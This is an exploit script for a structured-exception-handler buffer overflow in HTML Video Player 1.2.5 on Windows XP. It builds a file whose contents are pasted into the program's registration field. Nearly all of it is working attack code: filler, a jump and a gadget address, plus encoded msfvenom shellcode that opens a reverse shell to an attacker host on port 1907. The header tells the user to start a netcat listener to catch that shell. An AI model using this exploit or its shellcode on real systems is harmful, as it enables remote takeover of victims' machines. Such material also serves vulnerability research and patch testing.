# Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow (SEH)
# Author: Kagan Capar
# Discovery Date: 2018-11-16
# Software Link: http://www.html5videoplayer.net/html5videoplayer-setup.exe
# Vendor Homepage : http://www.html5videoplayer.net
# Tested Version: 1.2.5
# Tested on OS: Windows XP SP3 *ENG
# Steps to Reproduce: Run the python exploit script; it writes the payload to a new
# file named "exploit.txt". Copy that file's content to the clipboard,
# open the software, click Help > Register, paste it into the "Username" field and click "OK".
# Finally, catch the reverse shell: the shellcode connects back to LHOST on port 1907,
# so start a listener there (e.g. nc -lvp 1907) before clicking "OK".

#!/usr/bin/python  # NOTE: a shebang is only honoured on line 1 of a file; run as "python exploit.py"
import struct

#SEH chain of main thread, item 0
#Address=0012EAF4
#SE handler=41414141
#=> next_handler below!
#SEH chain of main thread, item 0
#Address=0012EAF4
#SE handler=336F4332 =>

#7C901931 5E POP ESI
#7C901932 5B POP EBX
#7C901933 C3 RETN

#Executable modules, item 14
#Base=7C900000
#Size=000B2000 (729088.)
#Entry=7C912AFC ntdll.<ModuleEntryPoint>
#Name=ntdll (system)
#File version=5.1.2600.6055 (xpsp_sp3_qfe.101
#Path=C:\WINDOWS\system32\ntdll.dll

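# --- payload layout ---------------------------------------------------------
# 124 * 16 = 1984 bytes of filler reach the SEH record; nSEH and the handler
# address are overwritten by the next 8 bytes (see the SEH-chain notes above).
JUNK = b"\x43\x57\x44\x4F\x4E\x4B\x4E\x50\x48\x52\x4B\x45\x59\x41\x4b\x53" * 124

# nSEH: "jmp $+8" (EB 06) followed by two NOPs.  The 2-byte jmp ends at
# offset 1986; +6 lands on offset 1992, the first shellcode byte, i.e. it
# hops over the 4-byte handler address that follows.
NSEH = b"\xEB\x06\x90\x90"

# SEH: POP ESI / POP EBX / RETN at 0x7C901931 in ntdll.dll (5.1.2600.6055,
# XP SP3 ENG, base 0x7C900000 per the module notes above).  This address is
# build-specific: any other ntdll version needs a fresh pop/pop/ret gadget.
SEH = struct.pack('<I', 0x7C901931)

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=1907 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a"
# x86/shikata_ga_nai succeeded with size 351 (iteration=0)
# Payload size: 351 bytes
# LHOST/LPORT are baked into these bytes: re-generate for any other listener.
SHELLCODE = (
    b"\xbe\xab\xfd\x5f\x95\xda\xcb\xd9\x74\x24\xf4\x5f\x29"
    b"\xc9\xb1\x52\x83\xef\xfc\x31\x77\x0e\x03\xdc\xf3\xbd"
    b"\x60\xde\xe4\xc0\x8b\x1e\xf5\xa4\x02\xfb\xc4\xe4\x71"
    b"\x88\x77\xd5\xf2\xdc\x7b\x9e\x57\xf4\x08\xd2\x7f\xfb"
    b"\xb9\x59\xa6\x32\x39\xf1\x9a\x55\xb9\x08\xcf\xb5\x80"
    b"\xc2\x02\xb4\xc5\x3f\xee\xe4\x9e\x34\x5d\x18\xaa\x01"
    b"\x5e\x93\xe0\x84\xe6\x40\xb0\xa7\xc7\xd7\xca\xf1\xc7"
    b"\xd6\x1f\x8a\x41\xc0\x7c\xb7\x18\x7b\xb6\x43\x9b\xad"
    b"\x86\xac\x30\x90\x26\x5f\x48\xd5\x81\x80\x3f\x2f\xf2"
    b"\x3d\x38\xf4\x88\x99\xcd\xee\x2b\x69\x75\xca\xca\xbe"
    b"\xe0\x99\xc1\x0b\x66\xc5\xc5\x8a\xab\x7e\xf1\x07\x4a"
    b"\x50\x73\x53\x69\x74\xdf\x07\x10\x2d\x85\xe6\x2d\x2d"
    b"\x66\x56\x88\x26\x8b\x83\xa1\x65\xc4\x60\x88\x95\x14"
    b"\xef\x9b\xe6\x26\xb0\x37\x60\x0b\x39\x9e\x77\x6c\x10"
    b"\x66\xe7\x93\x9b\x97\x2e\x50\xcf\xc7\x58\x71\x70\x8c"
    b"\x98\x7e\xa5\x03\xc8\xd0\x16\xe4\xb8\x90\xc6\x8c\xd2"
    b"\x1e\x38\xac\xdd\xf4\x51\x47\x24\x9f\x9d\x30\x26\x48"
    b"\x76\x43\x26\x71\xf5\xca\xc0\x17\xe9\x9a\x5b\x80\x90"
    b"\x86\x17\x31\x5c\x1d\x52\x71\xd6\x92\xa3\x3c\x1f\xde"
    b"\xb7\xa9\xef\x95\xe5\x7c\xef\x03\x81\xe3\x62\xc8\x51"
    b"\x6d\x9f\x47\x06\x3a\x51\x9e\xc2\xd6\xc8\x08\xf0\x2a"
    b"\x8c\x73\xb0\xf0\x6d\x7d\x39\x74\xc9\x59\x29\x40\xd2"
    b"\xe5\x1d\x1c\x85\xb3\xcb\xda\x7f\x72\xa5\xb4\x2c\xdc"
    b"\x21\x40\x1f\xdf\x37\x4d\x4a\xa9\xd7\xfc\x23\xec\xe8"
    b"\x31\xa4\xf8\x91\x2f\x54\x06\x48\xf4\x74\xe5\x58\x01"
    b"\x1d\xb0\x09\xa8\x40\x43\xe4\xef\x7c\xc0\x0c\x90\x7a"
    b"\xd8\x65\x95\xc7\x5e\x96\xe7\x58\x0b\x98\x54\x58\x1e"
)

# Bytes the target mangles (the -b list given to msfvenom).  The shellcode was
# encoded to avoid them; the rest of the payload must avoid them as well.
BAD_CHARS = b"\x00\x0a\x0d\x1a"
# Size of the written file; everything after the shellcode is NOP padding.
TOTAL_LEN = 4000
OUTPUT_FILE = "exploit.txt"


def build_payload():
    """Return the complete TOTAL_LEN-byte SEH-overwrite buffer as bytes.

    Layout: JUNK (1984) | nSEH (4) | SEH (4) | SHELLCODE (351) | NOP pad.

    Raises:
        ValueError: if the fixed parts exceed TOTAL_LEN (e.g. after swapping
            in a larger shellcode), or if any BAD_CHARS byte is present
            anywhere in the buffer.
    """
    buf = JUNK + NSEH + SEH + SHELLCODE
    if len(buf) > TOTAL_LEN:
        raise ValueError("payload is %d bytes, exceeds %d" % (len(buf), TOTAL_LEN))
    buf += b"\x90" * (TOTAL_LEN - len(buf))
    # Slicing (not iteration) keeps this check identical on Python 2 and 3,
    # where iterating a bytes object yields str vs int.
    found = [BAD_CHARS[i:i + 1] for i in range(len(BAD_CHARS)) if BAD_CHARS[i:i + 1] in buf]
    if found:
        raise ValueError("bad characters present in payload: %r" % (found,))
    return buf


def main():
    """Write the payload to OUTPUT_FILE and print its length."""
    payload = build_payload()
    # Binary mode: in text mode on Windows any 0x0a would be written as 0x0d 0x0a.
    with open(OUTPUT_FILE, "wb") as out:
        out.write(payload)
    print(len(payload))


if __name__ == "__main__":
    main()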